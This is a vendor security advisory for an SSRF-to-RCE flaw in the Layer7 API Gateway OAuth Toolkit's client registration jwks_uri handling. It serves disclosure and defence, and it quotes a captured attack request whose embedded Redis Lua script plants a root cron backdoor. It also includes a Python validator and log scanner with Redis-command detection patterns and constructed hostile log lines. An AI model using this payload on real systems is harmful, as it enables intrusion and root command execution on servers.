CVE-2026-1180 Affecting CA-API Gateway 11.x and OTK 4.6.x versions
Article ID: 438852


Products

CA API Gateway

Issue/Introduction

Introduction

Layer7 API Gateway environments that use the OAuth Toolkit (OTK) may be affected by a flaw in the OpenID Connect Dynamic Client Registration feature. A registration request may carry a jwks_uri parameter, and the Gateway fetches that URL without validating its destination. An attacker can therefore point jwks_uri at hosts and ports the Gateway can reach but the attacker cannot, which is Server-Side Request Forgery (SSRF); where the reachable service acts on the request, such as an HTTP interface to Redis as in the captured payload below, the SSRF can be escalated to Remote Code Execution (RCE).

Symptoms

Active exploitation attempts show up as unexpected requests to the OIDC registration endpoint. Real-time debug logs may capture malicious payloads in the jwks_uri field, for example a URL that carries Redis commands to an HTTP interface on port 7379: "jwks_uri": "http://####:7379/EVAL/redis.call('CONFIG','SET','dir','/etc/cron.d')..."

The following request body was captured directly from real-time debug of the affected service and is provided unchanged for analysis. The Lua script embedded in the URL repoints the Redis dump directory to /etc/cron.d, names the dump file wshell4, stores a crontab entry under key c and calls BGSAVE so that Redis writes the entry into a file cron will read; the resulting job polls the local Redis (127.0.0.1:6379) every minute for a command in key wsh_in, runs it with bash and stores the output in key wsh_out.

{
  "client_name": "my_client_name",
  "grant_types": ["client_credentials"],
  "response_types": ["token"],
  "redirect_uris": ["https://example.com/cb"],
  "token_endpoint_auth_method": "private_key_jwt",
  "token_endpoint_auth_signing_alg": "ES256",
  "jwks_uri": "http://<IP_Address>:7379/EVAL/redis.call('CONFIG','SET','dir','/etc/cron.d'); redis.call('CONFIG','SET','dbfilename','wshell4'); redis.call('SET','c',[==[
PATH=/usr/bin:/usr/local/bin:/bin:/usr/sbin:/sbin
* * * * * root RCL=$(which redis-cli 2>/dev/null); [ -z \"$RCL\" ] && RCL=/usr/bin/redis-cli; CMD=$($RCL -h 127.0.0.1 -p 6379 GETDEL wsh_in 2>/dev/null); [ -n \"$CMD\" ] && OUT=$(bash -c \"$CMD\" 2>&1 | tr -d '\\000-\\010\\013-\\031' | head -c 2000) && $RCL -h 127.0.0.1 -p 6379 SET wsh_out \"$OUT\"
]==]); redis.call('BGSAVE'); return 'ok'/0"
}

Affected endpoints include:

  • /openid/connect/register
  • /.well-known/openid-configuration
  • /openid/connect/jwks.json

Environment

  • Layer7 API Gateway: 11.0, 11.1
  • OAuth Toolkit (OTK): 4.6.0 - 4.7.0

Cause

The Gateway fetches the jwks_uri supplied in a Dynamic Client Registration request without sufficiently validating its destination, so the URL may point at loopback, internal or otherwise unintended hosts and ports.
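The destination check that the cause above calls for, together with a detector for the debug-log pattern described under Symptoms, as an added example (this is not OTK or Gateway code). It assumes a policy that a JWKS document is only ever fetched over HTTPS on port 443 from a globally routable address, a one-line debug log format of the form "<timestamp> <method> <path> body=<json>", and a constructed resolver table standing in for DNS; the sample log lines and IP addresses are constructed, with 10.0.0.5 standing in for the redacted address in the captured payload.

```python
"""Destination check for jwks_uri plus a scan over captured registration
requests. Added example for this advisory; not OTK or Gateway code."""
import ipaddress
import json
import re
from typing import Callable, Dict, List, Tuple
from urllib.parse import urlsplit

# Policy assumptions (not stated by the advisory): a JWKS document is fetched
# only over HTTPS on port 443 and only from globally routable addresses.
ALLOWED_SCHEMES = {"https"}
ALLOWED_PORTS = {443}
# Fragments of the captured payload that never belong in a JWKS URL.
REDIS_MARKERS = re.compile(r"/EVAL/|redis\.call|BGSAVE|CONFIG\W*SET", re.IGNORECASE)

Resolver = Callable[[str], List[str]]  # hostname -> IP address strings


def _literal_ip(host: str):
    try:
        return ipaddress.ip_address(host)
    except ValueError:
        return None


def check_jwks_uri(uri: str, resolve: Resolver) -> Tuple[bool, str]:
    """Hardened check to apply before the Gateway fetches jwks_uri.
    Returns (ok, reason); every failure is fail-closed."""
    try:
        parts = urlsplit(uri)
        port = parts.port          # ValueError on a non-numeric/out-of-range port
    except ValueError:
        return False, "unparseable URL or port"
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        return False, f"scheme {parts.scheme!r} not allowed"
    if parts.username is not None or parts.password is not None:
        return False, "userinfo not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    if (port or 443) not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    literal = _literal_ip(host)
    try:
        addrs = [literal] if literal else [ipaddress.ip_address(a) for a in resolve(host)]
    except Exception as exc:       # resolver error or garbage answer: fail closed
        return False, f"resolution failed: {exc}"
    if not addrs:
        return False, "host resolves to nothing"
    for ip in addrs:               # rejects loopback, RFC 1918, link-local, multicast...
        if not ip.is_global or ip.is_multicast:
            return False, f"{host} resolves to non-public address {ip}"
    return True, "ok"


def scan_debug_log(lines: List[str], resolve: Resolver) -> List[Dict[str, str]]:
    """Flag registration requests whose jwks_uri is hostile or off-policy.
    Expects constructed lines of the form '<timestamp> <method> <path> body=<json>'."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        if "/openid/connect/register" not in line or " body=" not in line:
            continue
        ts = line.split(" ", 1)[0]
        body = line.partition(" body=")[2]
        try:
            reg = json.loads(body)
        except json.JSONDecodeError:
            findings.append({"ts": ts, "client_name": "", "jwks_uri": "",
                             "reason": "unparseable body"})
            continue
        uri = reg.get("jwks_uri")
        if not uri:
            continue                # nothing will be fetched, nothing to forge
        if REDIS_MARKERS.search(uri):
            ok, reason = False, "Redis command markers in jwks_uri"
        else:
            ok, reason = check_jwks_uri(uri, resolve)
        if not ok:
            findings.append({"ts": ts, "client_name": str(reg.get("client_name", "")),
                             "jwks_uri": uri, "reason": reason})
    return findings


# Constructed resolver table standing in for DNS (addresses are placeholders).
FAKE_DNS = {
    "idp.example.com": ["93.184.216.34"],        # a public address
    "jwks.internal.example": ["10.20.30.40"],    # a name that resolves into the LAN
}


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS[host]          # KeyError is treated as a resolution failure


# Constructed debug lines modelled on the captured request; 10.0.0.5 stands in
# for the redacted IP in the advisory and the Lua script is shortened.
SAMPLE_LOG = [
    '2026-03-01T10:00:00Z POST /openid/connect/register body={"client_name":"partner-app","jwks_uri":"https://idp.example.com/.well-known/jwks.json"}',
    '2026-03-01T10:00:05Z POST /openid/connect/register body={"client_name":"my_client_name","token_endpoint_auth_method":"private_key_jwt","jwks_uri":"http://10.0.0.5:7379/EVAL/redis.call(\'CONFIG\',\'SET\',\'dir\',\'/etc/cron.d\'); redis.call(\'BGSAVE\'); return \'ok\'/0"}',
    '2026-03-01T10:00:09Z POST /openid/connect/register body={"client_name":"probe","jwks_uri":"https://jwks.internal.example/jwks.json"}',
    '2026-03-01T10:00:12Z GET /openid/connect/jwks.json',
]

if __name__ == "__main__":
    for f in scan_debug_log(SAMPLE_LOG, fake_resolve):
        print(f"{f['ts']} client={f['client_name']!r} reason={f['reason']}")
```

Two caveats for anyone porting the check into a real policy: the address that passed validation must be the one the fetch actually connects to (resolve once and pin it, otherwise a second lookup at fetch time reopens the hole via DNS rebinding), and HTTP redirects on the JWKS fetch must be disabled or re-validated with the same check. The stored jwks_uri of an already registered client should also be re-checked whenever the JWKS is refreshed, since a registration accepted before the patch may still carry a hostile URL.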

Resolution

Fixed in release OTK 4.7.1 and higher. Use Download Solution Patches to download this release.

For users on earlier versions, apply the version-specific patch:

Workaround: If Dynamic Client Registration is not required, disable the following service endpoints on the Gateway:

  1. /openid/connect/register
  2. /openid/connect/register/*

Additional Information

  • Internal Defect: DE669709
  • To speak with a customer representative or a Support Engineer see Contact Support. Scroll to the bottom of the page and click on your respective region.